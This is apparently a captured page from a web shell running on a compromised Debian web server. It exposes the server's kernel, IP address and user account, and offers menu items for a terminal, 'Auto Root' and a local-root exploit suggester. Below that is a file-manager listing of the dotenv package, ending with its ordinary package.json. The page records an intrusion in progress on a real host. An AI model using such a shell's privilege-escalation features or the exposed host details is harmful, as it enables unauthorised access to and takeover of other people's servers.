Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
node_modules /
dotenv /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
types
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
CHANGELOG.md
5.64
KB
-rw-r--r--
2022-04-21 14:25
LICENSE
1.26
KB
-rw-r--r--
2022-04-21 14:25
README.md
9.78
KB
-rw-r--r--
2022-04-21 14:25
config.js
189
B
-rw-r--r--
2022-04-21 14:25
package.json
1.22
KB
-rw-r--r--
2022-04-21 14:25
Save
Rename
{ "name": "dotenv", "version": "10.0.0", "description": "Loads environment variables from .env file", "main": "lib/main.js", "exports": { ".": "./lib/main.js", "./config": "./config.js", "./config.js": "./config.js", "./package.json": "./package.json" }, "types": "types/index.d.ts", "scripts": { "flow": "flow", "dtslint": "dtslint types", "lint": "standard", "postlint": "standard-markdown", "pretest": "npm run lint && npm run dtslint", "test": "tap tests/*.js --100", "prerelease": "npm test", "release": "standard-version" }, "repository": { "type": "git", "url": "git://github.com/motdotla/dotenv.git" }, "keywords": [ "dotenv", "env", ".env", "environment", "variables", "config", "settings" ], "readmeFilename": "README.md", "license": "BSD-2-Clause", "devDependencies": { "decache": "^4.5.1", "dtslint": "^0.9.8", "flow-bin": "^0.109.0", "sinon": "^7.5.0", "standard": "^13.1.0", "standard-markdown": "^5.1.0", "standard-version": "^7.0.0", "tap": "^14.7.0" }, "dependencies": {}, "engines": { "node": ">=10" }, "standard": { "ignore": [ "flow-typed/" ] } }